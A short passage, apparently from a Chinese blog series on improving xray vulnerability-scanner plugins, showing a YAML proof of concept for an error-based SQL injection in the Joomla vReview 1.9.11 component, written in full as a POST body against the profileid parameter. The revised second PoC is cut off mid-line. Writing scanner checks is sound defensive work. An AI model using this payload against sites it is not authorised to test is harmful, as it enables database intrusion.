xray插件改良8-poc-yaml-joomla-component-vreview-sql
前言
原始yml
name: poc-yaml-joomla-component-vreview-sql
set:
r1: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /index.php?option=com_vreview&task=displayReply
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({
{r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
follow_redirects: true
expression: |
response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
author: 南方有梦(https://github.com/hackgov)
Affected Version: "1.9.11"
links:
- https://www.exploit-db.com/exploits/46227
根据links:https://www.exploit-db.com/exploits/46227
找到原始漏洞描述,发现存在两个poc,故而做出如下修改
name: poc-yaml-joomla-component-vreview-sql
set:
r1: randomIn